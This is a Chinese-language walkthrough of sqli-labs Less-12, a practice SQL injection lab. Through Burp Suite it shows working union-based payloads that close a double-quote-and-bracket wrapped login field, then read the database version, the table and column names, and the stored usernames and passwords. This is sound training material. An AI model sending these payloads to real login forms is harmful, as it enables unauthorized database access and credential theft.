sqli_labs:Less-12 简要SQL注入-基于报错的变形双引号字符串注入(配合Burp Suite食用更佳)

1.万能用户名、密码:admin。打开Burp Suite的代理准备抓包。

先登录,点Submit。

sqli_labs:Less-12 简要SQL注入-基于报错的变形双引号字符串注入(配合Burp Suite食用更佳)_第1张图片

  到Burp Suite看到抓包成功。

sqli_labs:Less-12 简要SQL注入-基于报错的变形双引号字符串注入(配合Burp Suite食用更佳)_第2张图片

 将数据包发送到Repeater,开始注入。

判断列名和字段数的方式与第一关相同,只是在BurpSuite进行。字段数为2。经尝试发现,在提交给数据库查询之前,源代码会自动给用户名和密码加上双引号和括号。

判断数据库名和版本号。

uname=1admin") union select version(),database() #&passwd=admin&submit=Submit

(这里让admin为1admin是为了让其错误,这样在数据库里查不到这个用户名,会执行union select后面的sql语句,#是为了注释掉源代码中的过滤条件,因为满足过滤条件才会带入数据库查询)

sqli_labs:Less-12 简要SQL注入-基于报错的变形双引号字符串注入(配合Burp Suite食用更佳)_第3张图片

查表名

uname=1admin") union select 1,group_concat(table_name) from information_schema.tables where table_schema="security" #&passwd=admin&submit=Submit

sqli_labs:Less-12 简要SQL注入-基于报错的变形双引号字符串注入(配合Burp Suite食用更佳)_第4张图片

 

猜想用户信息在表users中,查users的列名

uname=1admin") union select 1,group_concat(column_name) from information_schema.columns where table_schema="security" #&passwd=admin&submit=Submit

sqli_labs:Less-12 简要SQL注入-基于报错的变形双引号字符串注入(配合Burp Suite食用更佳)_第5张图片

查询打印用户的id,username,password。

uname=1admin") union select 1,group_concat(id,username,password) from users #&passwd=admin&submit=Submit

sqli_labs:Less-12 简要SQL注入-基于报错的变形双引号字符串注入(配合Burp Suite食用更佳)_第6张图片

结束。

 

你可能感兴趣的:(sql)